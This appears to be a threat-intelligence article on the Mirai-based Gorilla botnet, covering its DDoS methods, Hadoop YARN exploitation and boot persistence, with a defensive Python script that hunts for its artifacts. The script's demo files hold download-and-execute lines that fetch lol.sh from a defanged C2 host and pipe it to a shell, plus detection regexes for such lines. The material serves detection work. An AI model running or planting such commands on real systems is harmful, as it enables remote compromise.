Cybersecurity researchers have identified a new botnet malware family called *Gorilla* (also known as *GorillaBot*), which is based on the leaked source code of the notorious Mirai botnet. The cybersecurity firm NSFOCUS, which detected this botnet activity in September 2024, reported that *Gorilla* issued over 300,000 attack commands between September 4 and September 27, averaging around 20,000 commands daily to carry out distributed denial-of-service (DDoS) attacks.
The *Gorilla* botnet has targeted more than 100 countries, with its attacks concentrated on universities, government websites, telecoms, banks, and the gaming and gambling sectors. The most frequently attacked countries include China, the U.S., Canada, and Germany.
According to NSFOCUS, *Gorilla* uses several DDoS attack methods, including UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood attacks. The VSE flood is a Mirai-era vector that bombards a target with Source Engine query packets of the kind game servers answer. Because UDP involves no handshake, a bot can stamp arbitrary forged source addresses on its packets and the traffic still lands at full rate, which makes attribution harder and lets a modest number of bots saturate a target; SYN floods likewise work with spoofed sources, since the attacker never needs to complete the connection.
One of the botnet’s distinguishing features is that it ships builds for multiple CPU architectures, including ARM, MIPS, x86_64, and x86, so the same campaign can infect routers and other embedded devices as well as ordinary servers. Each bot connects to one of five predefined command-and-control (C2) servers to receive instructions for launching DDoS attacks.
*Gorilla* also includes an interesting twist by embedding functions that exploit a known security weakness in Apache Hadoop YARN RPC to achieve remote code execution. This is an exposure rather than a single patched bug: a YARN ResourceManager that is reachable without authentication accepts application submissions from anyone, and the launch command of a submitted application runs on the cluster's nodes. Clusters that leave Hadoop's default "simple" authentication in place and expose the ResourceManager (RPC on port 8032, web interface on port 8088 by default) to untrusted networks are the ones at risk; the defensive check is to confirm that hadoop.security.authentication is set to kerberos and that those ports are not Internet-facing. The weakness has been exploited in the wild since 2021, as noted by Alibaba Cloud and Trend Micro.
The botnet ensures persistence on infected hosts by creating a service file named *custom.service* in the “/etc/systemd/system/” directory and enabling it so that it runs at every boot. The service downloads and executes a shell script named *lol.sh* from a remote server (“pen.gorillafirewall[.]su”). Similar download-and-execute commands are appended to other startup files, namely “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd,” so the script is re-run at system startup or when a user logs in. None of these files changes often on a healthy system, so any recent modification, a unit name no package owns, or a line that fetches a script over the network and pipes it to a shell is worth treating as an indicator.
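As an added triage aid (not code from the NSFOCUS report or from the malware itself), the following Python scans a filesystem root for the persistence artifacts described above: a unit literally named custom.service, references to the reported domain or to lol.sh in the listed startup files and in every systemd unit, and a generic "fetch with wget/curl/tftp, then hand to a shell" pattern that would also catch a renamed stager. The fake filesystem it builds for its demo run, including the unit and inittab contents, is constructed here to mirror the described behavior and is not the real dropped file; the regexes match both the live and the defanged form of the domain so the script can be run against write-ups as well as hosts.

```python
"""Triage check for the GorillaBot persistence artifacts described above.

Usage: python gorilla_persistence_hunt.py [ROOT]
Point ROOT at "/" on a live host or at a mounted disk image; with no
argument it builds and scans a constructed demo tree.
"""
from __future__ import annotations

import re
import sys
import tempfile
from pathlib import Path

# Boot/login hooks named in the write-up, relative to the filesystem root.
STARTUP_FILES = ["etc/inittab", "etc/profile", "boot/bootcmd"]
UNIT_DIR = "etc/systemd/system"

# Indicators: the reported domain and stager name (live or defanged), plus a
# generic "download something, then pipe/chain it into a shell" pattern.
INDICATORS = {
    "gorilla_c2_domain": re.compile(r"gorillafirewall(?:\[\.\]|\.)su", re.I),
    "gorilla_stager": re.compile(r"\blol\.sh\b"),
    "download_and_execute": re.compile(
        r"\b(?:wget|curl|tftp)\b[^\n]*?(?:\||;|&&)\s*(?:/bin/)?(?:ba)?sh\b", re.I
    ),
}


def _scan_file(root: Path, rel: str) -> dict | None:
    """Return a finding for root/rel if any indicator matches, else None."""
    path = root / rel
    if not path.is_file():
        return None
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A unit named custom.service is suspicious on its own: no distribution
    # ships one, and it is the exact name the report documents.
    if path.name == "custom.service":
        hits.append("unexpected_unit_custom.service")
    return {"path": "/" + rel, "indicators": hits} if hits else None


def hunt(root_dir: str) -> list[dict]:
    """Scan the startup files and every systemd unit under root_dir."""
    root = Path(root_dir)
    targets = list(STARTUP_FILES)
    unit_dir = root / UNIT_DIR
    if unit_dir.is_dir():
        targets += [f"{UNIT_DIR}/{p.name}" for p in sorted(unit_dir.glob("*.service"))]
    return [f for f in (_scan_file(root, rel) for rel in targets) if f]


def build_demo_root() -> str:
    """Constructed fake filesystem for an offline demo (not a real sample)."""
    root = Path(tempfile.mkdtemp(prefix="gorilla-demo-"))
    (root / UNIT_DIR).mkdir(parents=True)
    # Hostile unit modeled on the described behavior: fetch lol.sh, run it.
    (root / UNIT_DIR / "custom.service").write_text(
        "[Unit]\nDescription=custom\n\n[Service]\n"
        'ExecStart=/bin/sh -c "wget http://pen.gorillafirewall[.]su/lol.sh '
        '-O /tmp/lol.sh; sh /tmp/lol.sh"\n\n[Install]\nWantedBy=multi-user.target\n'
    )
    # Benign unit that must not be flagged.
    (root / UNIT_DIR / "sshd.service").write_text(
        "[Service]\nExecStart=/usr/sbin/sshd -D\n"
    )
    # Hostile inittab line using curl | sh instead of wget; benign profile.
    (root / "etc/inittab").write_text(
        '::sysinit:/bin/sh -c "curl -s http://pen.gorillafirewall[.]su/lol.sh | sh"\n'
    )
    (root / "etc/profile").write_text("export PATH=/usr/local/bin:$PATH\n")
    return str(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_root()
    for finding in hunt(target):
        print(f"{finding['path']}: {', '.join(finding['indicators'])}")
```

The domain and file-name patterns are the cheap, high-confidence matches for this particular campaign; the download-and-execute pattern is the one that survives a rename of the stager or a move to a new C2 host, at the cost of occasionally flagging legitimate provisioning scripts, which is why the script reports each indicator name separately rather than a single verdict.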
NSFOCUS noted that *Gorilla* combines its range of DDoS techniques with encryption methods commonly used by the Keksec group and multiple counter-detection measures in order to keep long-term control over compromised IoT devices and cloud hosts. Taken together, these traits mark it as an emerging botnet family built to evade detection and persist rather than a simple rebuild of the Mirai source.